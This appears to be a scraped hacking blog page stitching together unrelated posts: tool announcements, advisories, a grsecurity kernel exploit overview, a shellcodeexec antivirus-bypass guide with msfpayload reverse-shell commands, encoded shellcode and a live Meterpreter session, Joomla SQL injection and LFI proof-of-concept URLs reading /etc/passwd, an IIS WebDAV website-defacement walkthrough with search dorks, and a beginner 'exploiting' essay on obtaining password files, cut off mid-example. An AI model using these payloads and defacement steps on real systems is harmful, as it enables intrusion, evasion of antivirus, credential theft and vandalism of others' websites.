Perform Smart SSL Cipher Enumeration:SSL Smart

SSLSmart, a highly flexible and interactive tool aimed at improving efficiency and reducing the false positives during SSL testing.
Among other things, SSLSmart simply an advanced and highly flexible Ruby based smart SSL cipher enumeration tool. It is an open source, cross platform, free tool. It was programmed because a number of tools on the Windows platform allow users to test for supported SSL ciphers suites, but most only provide testers with a fixed set of cipher suites. Further testing is performed by initiating an SSL socket connection with one cipher suite at a time, an inefficient approach that leads to false positives and often does not provide a clear picture of the true vulnerability of the server. SSLSmart is designed to combat these shortcomings.


SSLSmart Features:


SSLSmart offers a wide range of features to improve testing efficiency and reduce false positives. These features are as follows:

• Content Scan (default): Exact server response can be seen in HTML and Text forms for each
• cipher suite selected for the test URL. Basically, it shows various server error messages received for weak cipher suites from live systems.
• CONNECT Scan: Focuses only on success or failure of SSL socket connection with various cipher suites. This behavior does not offer any advantage over existing SSL testing tools and is thus likely to have similar issues with false positives. However, this scan is faster and consumes fewer network and CPU resources.
• Dynamic Cipher Suite Support: Most SSL testing tools provide a fixed set of cipher suites. SSLSmart hooks into Ruby OpenSSL bindings and offers dynamic “on the fly” cipher suite generation capabilities.
• Certificate Verification: SSLSmart performs server certificate verification. It uses the Firefox Root CA Certificate4 repository to perform Root CA verification. Additional Root CA Certificates can be added to the rootcerts.pem file or a custom .pem file can be supplied for Root CA Certificate verification.
• Proxy Support: SSLSmart provides web proxy support. For results to be accurate, it is important to use a transparent proxy5.
• Reporting: Reports can be generated in XML, HTML and Text formats along with their verbose versions. Verbose report versions include complete application response for each cipher suite and full details of the server certificate.
• API’s: Monkey patched Ruby API’s that form the backbone of SSLSmart can be consumed to write custom Ruby scripts for quick tests. These API’s can be consumed by users who work with the SSLSmart gem.

What i liked the most about this tool is that SSLSmart supports XML, HTML, Text and their corresponding verbose reporting versions. In addition to details in the normal report, verbose versions include complete application responses for each cipher suite and full details of server certificates. Another feature that i liked is the API support. These API’s form the backbone for SSLSmart tests can be used to write custom scripts. SSLSmart gem includes source code and can be used by users who have Ruby installed on their systems and it comes from McAfee labs!


Platform Support and Installers:


SSLSmart has been tested to work on the following platforms and versions of Ruby:
Windows: Ruby 1.8.6 with wxruby6 (2.0.0) and builder7 (2.1.2).
Linux: Ruby 1.8.7/1.9.1 with wxruby (2.0.0) and builder (2.1.2).


Download SSLSmart:


SSLSmart 1.0 – SSLSmart-Gem-Win-Installer.zip/sslsmart-1.0.gem – http://downloadcenter.mcafee.com/products/tools/foundstone/SSLSmart-Gem-Win-Installer.zip

A Code Execution Vulnerability in Google App Engine SDK for Python

Google App Engine is a great technology allowing web developers to develop their own web applications,test them in their internal framework, and deploy them to Google’s appspot.com domain.The Google App Engine framework allows developers to write their web site logic in Python, and offers several frameworks specially created for this. In addition, Google App Engine provides an SDK Console via web that acts as an administration console for the newly written application.This advisory lists 4 different vulnerabilities, one in admin console and three others in the Google python API, which allow a remote attacker to gain full code execution on the developer’s machine. These severe issues have been communicated to Google, and a fix was released last month on Sep 12, 2012 (in version 1.5.4).

Download PDF

WebBackdoors , Attack, Evasion and Detection

This paper provides insight on common web back doors and how simple manipulations could make them undetectable by AV and other security suits. Paper explains few techniques that could be used to render undetectable and unnoticed backdoor inside web applications. This paper is mainly an update for an old paper of ours Effectiveness of Antivirus in Detecting Web Application Backdoors, which mainly questioned the effectiveness of AV with respect to web shells and analysis of a couple of web shells. Current paper takes this topic further and explains a couple of methodologies that could be used to make stealth application layer backdoors using web scripting languages .This paper explains various Web Backdoor attacks and evasion techniques that could be used to stay undetected.


Download PDF

Download BackTrack 5

How to download BackTrack 5

Download BackTrack 5 directly

Download BackTrack 5 from Mirror - Download BackTrack 5 Torrent

Name:     BT5-KDE-32.torrent
   
Size:           1840
   
Flavor:        KDE
   
Arch:          32 bit
   
Image:       ISO
   
Download BackTrack 5 KDE-32Bit  From Here  :     Torrent
   
MD5:     4150643026d292717f77ebb83948a034
     
=================

Name:     BT5-KDE-64.torrent
   
Size:            1800
   
Flavor:         KDE
   
Arch:           64 bit
   
Image:         ISO
   
Download BackTrack 5 KDE-64Bit From here :     Torrent
   
MD5:     80d65610de90ac7ede49b9f7935dfdd2
     
==================


Name:     BT5-GNOME-32.torrent
   
Size:                  1910
   
Flavor:              GNOME
   
Arch:                 32 bit
   
Image:               ISO
   
Download BackTrack 5 Gnome-32Bit From Here :       Torrent
   
MD5:                 b01a93a916fabb6d1640bd0054428e17

============================================

Name:              BT5-GNOME-64.torrent
   
Size:                1870
   
Flavor:            GNOME
   
Arch:               64 bit
   
Image:             ISO
   
Download BackTrack 5 Gnome-64Bit From Here:     Torrent
   
MD5:                75c4e7a969abc873d9e085656b156345

Your Way to grsec/PaX Bypass-stackjacking

Technique to exploit grsecurity/PaX-hardened Linux kernels.  Read on for a brief overview of our presentation and a link to the full slides and PoC code.
By (Dan Rosenberg and jon oberheide)

The Stackjacking Technique

In our slides, we presented a technique to exploit a grsecurity/PaX-hardened Linux kernel (eg. GRKERNSEC_HIGH) given the existence of two exploitation primitives:

• an arbitrary kernel write; and
• a kernel stack memory disclosure

To be clear, this attack vector is completely unnecessary when exploiting a vanilla Linux kernel, since an arbitrary write is more than sufficient to get root, given the vast amount of useful targeting information Linux gives out via /proc, etc. Likewise, the kernel stack memory disclosure is also unnecessary on vanilla, since there are much easier ways of getting this information. However, due to GRKERNSEC_HIDESYM (which aims to remove all known sources of info leakage), PAX_KERNEXEC (which makes global data structures with known locations read-only), and other mitigation features of grsecurity/PaX, effective exploitation is orders of magnitude harder than a vanilla kernel and took a few interesting twists.
Our technique can be broken down into three distinct stages:

• Stack self-discovery: We observed that kernel stack memory disclosures can leak sensitive addresses to userspace.  In particular, if we can leak a pointer TO the kernel stack that resides ON the kernel stack, we can calculate the base of our own process’ kernel stack: kstack_base = leaked_addr & ~(THREAD_SIZE-1).  We call this technique stack self-discovery.
• Stack groping: If our end goal is to read the address of our process’ cred structure and use our write to modify it and escalate privileges, we need to turn our kleak+kwrite into an arbitrary read.  We discovered two such techniques to do this: (1) the Rosengrope technique that modifies addr_limit in thread_info metadata stored at the base of the kstack to allow arbitrary reads from kernel space to userspace; and (2) the Obergrope technique that manipulates saved registers within a kernel stack frame that are later popped and used as the source address for copy_to_user()/put_user() operations.
• Stack jacking: After constructing our arbitrary read from a kleak+kwrite, we read the task_struct address out of thread_info at the base of the kstack and then read the cred struct address out of task_struct. Armed with the address of our process’ credential structure and an arbitrary write, we modified our uids/gids/caps to escalate privileges.

For the full details, please see the presentation materials and PoC code:

• Infiltrate 2011 [PDF]
• Hackito Ergo Sum 2011 [PDF]
• PoC Code [GITHUB]

The Response

If you haven’t yet read spender’s response to our presentation, I recommend doing so.  While I’ll refrain from commenting on the political aspects of his post, I’ll happily comment on the technical aspects.  The fixes that spender and pipacs have released have mitigated the particular exploit vectors we used to perform the stack groping stage of our attack against the grsec/PaX kernel:

• The thread_info struct has been moved out from the base of the kernel stack preventing the Rosengrope technique from being able to write KERNEL_DS into the addr_limit member.
• The RANDKSTACK feature, now available on both i386 and amd64, frustrates the Obergrope technique as the randomization of the kernel stack pointer on each system call makes writing into a particular offset in the stack frame unreliable.

Props to spender and pipacs for cranking out those fixes as well as a number of other enhancements.  While the latest grsecurity patch effectively prevents the current vectors we discovered and presented in our talks at HES and Infiltrate, there are several loose ends I need to investigate to ensure the fixes address other potential exploitation vectors.
More on that later…

DHCP vulnerability in some Ubuntu releases

Ubuntu Security Notice USN-1108-2
April 19, 2011

dhcp3 vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 9.10

Summary:

An attacker's DHCP server could send crafted responses to your computer and
cause it to run programs as root.

Software Description:
- dhcp3: DHCP Client 

Details:

USN-1108-1 fixed vulnerabilities in DHCP. Due to an error, the patch to fix
the vulnerability was not properly applied on Ubuntu 9.10 and higher. This
update fixes the problem.

Original advisory details:

 Sebastian Krahmer discovered that the dhclient utility incorrectly filtered
 crafted responses. An attacker could use this flaw with a malicious DHCP
 server to execute arbitrary code, resulting in root privilege escalation.

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 10.10:
  dhcp3-client                    3.1.3-2ubuntu6.2

Ubuntu 10.04 LTS:
  dhcp3-client                    3.1.3-2ubuntu3.2

Ubuntu 9.10:
  dhcp3-client                    3.1.2-1ubuntu7.3

In general, a standard system update will make all the necessary changes.

References:
  CVE-2011-0997

Package Information:
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.3-2ubuntu6.2
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.3-2ubuntu3.2
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.2-1ubuntu7.3

Bypass Antivirus Protection And Execute Metasploit Payloads

Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Protection!
Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit and your execute from memory meterpreter script fails you. The antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script to execute in memory a sequence of opcodes. Its current features include:

• Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
• Can be compiled and works on 32-bit and 64-bit architectures.
• As far as I know, no AV detect it as malicious.
• Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
• It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
• Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.

How to use shellcodeexec?
The author presents perfect examples to run the tool. We have listed them as under:
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:

1	$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

Or for a Windows target:

1	$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target:

1	$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

Or for a Windows target:

1	$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target:

1	$ ./shellcodeexec

Or, on the Windows target:

1	C:WINDOWSTemp>shellcodeexec.exe

Download shellcodeexec (inquisb-shellcodeexec.zip) here.

2nd:

Background

Most of the shellcode launchers out there, including proof of concepts part of many security books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems.

Description

This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems.

Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line:

$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe

This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot.

I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor.

So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play!

Features

shellcodeexec:

• Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
• Can be compiled and works on 32-bit and 64-bit architectures.
• As far as I know, no AV detect it as malicious.
• Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable.
• It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
• Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.

Example

1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Windows target:

$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E
4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KR
ZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP
4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6Nk
VlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQ
xVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeR
pV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7
E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKO
N5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC
1KsVIO6OuZVCEXlISAA

2. Execute the Metasploit multi/handler listener on your machine. For example for a Windows target:

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Windows target:

C:\WINDOWS\Temp>shellcodeexec.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4L
KV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPP
RQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4Nk
EQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlR
kNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxV
SGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV
0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8N
yI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5L
KP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1Ks
VIO6OuZVCEXlISAA

If you head back to the terminal where the multi/handler is running you will happily see:

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUhread LPORT=4444 LHOST=192.168.136.1 E

[*] Please wait while we load the module tree...

[...]

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]

+ -- --=[ 673 exploits - 354 auxiliary

+ -- --=[ 217 payloads - 27 encoders - 8 nops

=[ svn r12306 updated 7 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp

EXITFUNC => thread

LPORT => 4444

LHOST => 192.168.136.1

[*] Started reverse handler on 192.168.136.1:4444

[*] Starting the payload handler...

[*] Sending stage (749056 bytes) to 192.168.136.129

[*] Meterpreter session 1 opened (192.168.136.1:4444 -> 192.168.136.129:1581) at Thu Apr 14 15:30:15 +0100 2011

meterpreter > sysinfo

System Language : en_US

OS : Windows .NET Server (Build 3790, Service Pack 2).

Computer : W2K3R2

Architecture : x86

Meterpreter : x86/win32

The tool along with compilation files for POSIX and Windows systems can be found on my GitHub at https://github.com/inquisb/shellcodeexec.
Thanks for reading

TCP/IP & UDP Attacks Introduction

Hello, Lets explain "TCP/IP & UDP Attacks", Most common and effective Web attacks...Lets Know abt its basic and types...

TCP/IP Attacks
1. TCP SYN or TCP ACK Flood Attack
2. TCP Sequence Number Attack
3. TCP/IP

UDP attacks

1. ICMP Attacks
2. Smurf Attacks
3. ICMP Tunneling

TCP operates using synchronized connections. The synchronization is vulnerable to attack; this is probably the most common attack used today. The synchronization or handshake, process initiates a TCP connection. This handshake is particularly vulnerable to a DoS attack referred to as the TCP SYN Flood attack. The process is also susceptible to access and modification attacks, which are briefly explained in the following sections.

TCP SYN or TCP ACK Flood Attack - This attack is very common... The purpose of this attack is to deny service. The attack begins as a normal TCP connection: the client and the server exchange information in TCP packets. The TCP client continues to send ACK packets to the server, these ACK packets tells the server that a connection is requested. The server thus responds to the client with a ACK packet, the client is supposed to respond with another packet accepting the connection to establish the session. In this attack the client continually send and receives the ACK packets but it does not open the session. The server holds these sessions open, awaiting the final packet in the sequence. This cause the server to fill up the available connections and denies any requesting clients access.

TCP Sequence Number Attack - This is when the attacker takes control of one end of a TCP session. The goal of this attack is to kick the attacked end of the network
for the duration of the session. Only then will the attack be successful. Each time a TCP message is sent the client or the server generates a sequence number. The attacker intercepts and then responds with a sequence number similar to the one used in the original session. This attack can then hijack or disrupt a session. If a valid sequence number is guessed the attacker can place himself between the client and the server. The attacker gains the connection and the data from the legitimate system. The only defense of such an attack is to know that its occurring... There is little that can be done...

TCP Hijacking - This is also called active sniffing, it involves the attacker gaining access to a host in the network and logically disconnecting it from the network. The attacker then inserts another machine with the same IP address. This happens quickly and gives the attacker access to the session and to all the information on the original system.

UDP packets aren't connection oriented and don't require the synchronization process as with TCP. UDP packets, however, are susceptible to interception, thus it can be attacked. UDP, like TCP, doesn't check the validity of an IP address. The nature of this layer is to trust the layer above it (I'm referring to the IP layer). The most common UDP attacks involve UDP flooding. UDP flooding overloads services, networks, and servers. Large streams of UDP packets are focused at a target, causing UDP services on that host to shut down. It can also overload the network and cause a DoS situation to occur.

ICMP Attacks - This occur by triggering a response from the ICMP protocol when it responds to a seemingly legitimate request (think of it as echoing). Ping for instance, that uses the ICMP protocol. sPing is a good example of this type of attack, it overloads te server with more bytes than it can handle, larger connections. Its ping flood.

Smurf Attacks - This attack uses IP spoofing and broadcasting to send a ping to a group of hosts on a network. When a host is pinged it send back ICMP message traffic information indicating status to the originator. If a broadcast is sent to network, all hosts will answer back to the ping. The result is an overload of network and the target system. The only way to prevent this attack is to prohibit ICMP traffic on the router.

ICMP Tunneling - ICMP can contain data about timing and routes. A packet can be used to hold information that is different from the intended information. This allows an ICMP packet to be used as a communications channel between two systems. The channel can be used to send a Trojan horse or other malicious packet. The counter measure is to deny ICMP traffic on your network.

Warning : ICMP can be very dangerous..and Even,as i said ...Don't try such attack from your pc,untill you don't know that how to be invisible on net ! Beccause once you get traced out ...No one can help you from Troubles..

sqlmap 0.9

sqlmap version 0.9.

“sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.“

• Rewritten SQL injection detection engine (Bernardo and Miroslav).
• Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav).
• Added full support for both time-based blind SQL injection and error-based SQL injection techniques (Bernardo and Miroslav).
• Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
• Implemented support for Firebird (Bernardo and Miroslav).
• Implemented support for Microsoft Access, Sybase and SAP MaxDB (Miroslav).
• Extended old ‘–dump -C‘ functionality to be able to search for specific database(s), table(s) and column(s), –search switch (Bernardo).
• Added support to tamper injection data with –tamper switch (Bernardo and Miroslav).
• Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack (Miroslav).
• Added support to enumerate roles on Oracle, –roles switch (Bernardo).
• Added support for SOAP based web services requests (Bernardo).
• Added support to fetch unicode data (Bernardo and Miroslav).
• Added support to use persistent HTTP(s) connection for speed improvement, –keep-alive switch (Miroslav).
• Implemented several optimization switches to speed up the exploitation of SQL injections (Bernardo and Miroslav).
• Support to test and inject against HTTP Referer header (Miroslav).
• Implemented HTTP(s) proxy authentication support, –proxy-cred switch (Miroslav).
• Implemented feature to speedup the enumeration of table names (Miroslav).
• Support for customizable HTTP(s) redirections (Bernardo).
• Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, –replicate switch (Miroslav).
• Support to parse and test forms on target url, –forms switch (Bernardo and Miroslav).
• Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns. Useful for instance when system table ‘information_schema‘ is not available on MySQL (Miroslav).
• Basic support for REST-style URL parameters by using the asterisk (*) to mark where to test for and exploit SQL injection (Miroslav).
• Added safe URL feature, –safe-url and –safe-freq (Miroslav).
• Added –text-only switch to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content (Miroslav).
• Implemented few other features and switches (Bernardo and Miroslav).
• Over 100 bugs fixed (Bernardo and Miroslav).
• Major code refactoring (Bernardo and Miroslav).
• User’s manual updated (Bernardo).

Download sqlmap 0.9 (sqlmap-0.9.tar.gz/sqlmap-0.9.zip) here.

Hacking Tool: John the Ripper: Crack Password

• It is a command line tool designed to crack both Unix and NT passwords. John is extremely fast and free
• The resulting passwords are case insensitive and may not represent the real mixed-case password.

John the Ripper is a fast password cracker, currently available for many flavors of UNIX (11 are officially supported), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak UNIX passwords. John the Ripper is a part of Owl, Debian GNU/Linux, SuSE, very recent versions of Mandrake Linux, and EnGarde Linux. It is in the ports/packages collections of FreeBSD, NetBSD, and OpenBSD.

John the Ripper is designed to be both powerful and fast. It combines several cracking modes in one program, and is fully configurable for specific needs. As John is available for different platforms, the attacker can use the same cracker everywhere and even continue a cracking session started on a different platform. It supports several cryptographic password hash types most commonly found on various UNIX flavors. Supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Out of the box, John supports (and auto detects) the following ciphertext formats: standard and double-length DES-based, BSDI's extended DES-based, FreeBSD's MD5-based, and OpenBSD's Blowfish-based. With just one additional command (required to extract the passwords), John can crack AFS passwords and WinNT LM hashes. John has highly optimized modules for different ciphertext formats and architectures. Some of the algorithms used - such as bitslice DES - require a more powerful interface. Additionally, there are assembly routines for several processors and architectures (special Intel Pentium version, x86 with MMX, generic x86, Alpha EV4, SPARC V8).

However, the resulting passwords are case insensitive and may not represent the real mixed-case password. Indeed, this is a small hindrance to a determined patient attacker.

joomlacontenteditor (com_jce) BLIND sql injection vulnerability

================================================
  joomlacontenteditor (com_jce) BLIND sql injection vulnerability
================================================
  
Software:   joomlacontenteditor (com_jce)
Vendor:     www.joomlacontenteditor.net
Vuln Type:  BLind SQL Injection
Download link:  http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
Dork:       inurl:"/index.php?option=com_jce"
  
  
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
  
  
==============================================================
Description:

JCE makes creating and editing Joomla!® content easy Add a set of tools to your 

Joomla!® environment that give you the power to create the kind of content you want,

without limitations, and without needing to know or learn HTML, XHTML, CSS... 

==============================================================

    exploit & p0c
  
[!] index.php?option=com_jce&Itemid=[valid Itemid]
  
    Example p0c
  
[!] http://host/index.php?option=com_jce&Itemid=8    <= True
[!] http://host/index.php?option=com_jce&Itemid=-8   <= False
  
  
==============================================================
  
    Nothing Impossible In This World Even Nobody`s Perfect
  
==============================================================

LFI Vulnerability in 1024cms Admin Control Panel v1.1.0 Beta

========================================================
1024cms Admin Control Panel v1.1.0 Beta (Master-cPanel Package) - 

Local File Include Vulnerability
========================================================
  
Software:             1024cms Admin Control Panel v1.1.0 Beta (master-cpanel package)
Vendor:                http://1024cms.org/
Vuln Type:              Local File Include
Remote:                 Yes
Local:                  No
Discovered by:  QSecure and Demetris Papapetrou 
Website:                http://www.qsecure.com.cy
Discovered:             15/03/2011
Reported:               29/03/2001
Disclosed:


VULNERABILITY DESCRIPTION:
==========================
The script "/index.php" is prone to a local file-include vulnerability because it fails 

to properly sanitize user-supplied input in the "processfile" parameter.

An attacker can exploit this vulnerability to obtain potentially sensitive information 

and execute arbitrary local scripts in the context of the webserver process. This 

may allow the attacker to compromise the application and the underlying computer; 

other attacks are also possible.


PoC Exploit:
============
/index.php?mode=login&processfile=../../../../../../etc/passwd

IIS EXPLOIT [For Xp And Win7

Steps for Xp-
# open run
# type-
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
and press enter !
#A new window name "WEB FOLDER" gets open
#Right click and click on New, Add Web Folder then enter your vulnerable website address.
#then next….finish
# now You can insert your page with name index.html by simply copy pasting.
Also after getting access to the website…Many websites don’t allows you to
add your page. so leave them.
#Dork- "Powered by IIS" or use your own unique dork.
Windows 7-
#Click Start.
#Click Computer.
# In the following dialog click Map Network Drive.
# On the Map Network Drive dialog, click "Connect to a Web site that you can use to store your documents and Pictures" this will pop up the "Welcome to the Add Network Location Wizard".
# Click on Next.
# Click on ”Choose a custom network location”.
# Click on Next.
# Now type the web folder address that you want to access.
# Enter a NAME to help you identify the web folder and click Next.
# Place a checkmark on ‘Open this network location when I click finish’.
# Click Finish.
and insert your deface page !!

Learn How to EXPLOIT : The Basics of EXPLOITING

NOTE: Some statements in here apply to beginners. If you read this and are an advanced user, you might say: "That is not true, I know a way....". Correct. But it is impossible to include every exception and technique without creating confusion. Read this essay as if you are a beginner....

NOTE 2: Some basic rules all good crackers and exploiters adhere to: Do not change, alter, or delete any info you may find on a site. This is just not done, and can actually
result in prosecution if you get caught.

On your exploiting journey, you may also come across confidential information from members, such as home addresses, credit card info etc. I know I have, many times over. I even found a hole where I could have the checks of site referrals sent to my account! Never use this information to your personal gain! This will be considered theft and misuse of personal information, and can get you into serious trouble...

OK, now with that out of the way, let's start the series on Exploiting...!

EXPLOITING - THE BASICS

OK, so you are tired of bruteforcing, have spoofed a couple of sites, and have seen posts with custom passes or complete member lists...and you wanna know how... If so, this essay is for you.

This basic exploiting essay assumes you understand or master the following techniques and skills with respect to website security:

• - Basic HTML
• - Brute forcing
• - Proxy use
• - Basic URL handling
• - Basic website structures
• - Basic Spoofing
• - Good AD skills or similar

But most importantly, you need a good brain and have a sincere interest in website security. Exploiting takes a lot of time and requires research on a regular basis. On the other hand, the rewards are well worth the effort in my opinion!

When trying to test the security of websites, you can gain access in the following manners, listed in order of technical difficulty:

1. 1. Guess passwords
2. 2. Brute force attacks
3. 3. Spoof the site
4. 4. Get and decrypt passfiles or logs
5. 5. Using scripts to add passes
6. 6. Get admin access (via telnet or browser)
7. 7. Hack the server via telnet

As you can see in the list above, exploiting is really nothing more than increasing your chances of getting access. Guessing passwords...to bruteforcing...to decrypting passfiles or logs...you increase your chances of getting a working pass with less effort!

HTACCESS and HTPASSWD

Since there are excellent tuts on this already, I am not going to spend a lot of time on this. One question I see a lot from newbies is that they "can not locate the htpasswd"....

A few notes on htaccess and htpasswd:

• - htaccess only sometimes shows the dir to the htpasswd (or passwd or different name)
• - the chances of getting this file are slim, as this vulnerability is well-known out there and most webmasters have denied you access, hidden the file, or placed the file on their home dir.

For the fans, here is some more detailed info on the subject I found:
In order to find the .htpasswd (or interpret the .htaccess) you need to understand the difference between the web root and the system root.

The AuthUserFile is specified in terms of the system root. That is, the directory structure you would see if you were actually logged into the computer through a terminal.

When a web browser accesses a machine, it is through a web server. The web server is configured so that the browser will start at some specific directory in the machine. I refer to that as the web root. It is specified in the web server configuration file, off in some directory you can't browse to.

So, lets say that the web root is set to /home/users/www.site.com/www. When you surf to http:/www.site.com/ you find yourself in the machine directory /home/users/www.site.com/www (but nothing really tells you that), and if there is an index.html there, you will display it.

So lets say that the web root is set as above, and that the .htaccess contains the line:

code:
--------------------------------------------------------------

AuthUserFile /home/users/www.site.com/www/hidden/.htpasswd

--------------------------------------------------------------
(or something similar)

Applying what I said above, you would find the .htpasswd at:

code:
--------------------------------------------------------

http://www.site.com/hidden/.htpasswd

--------------------------------------------------------

Since the web root is /home/users/www.site.com/www. You still may not be able to read it because it might be forbidden through some other method, say only accessible from certain IP addresses, or . files are not accessible through their web server.

Now, lets say the .htaccess said:


code:
--------------------------------------------------------------

AuthUserFile /home/users/abc.com/hidden/.htpasswd

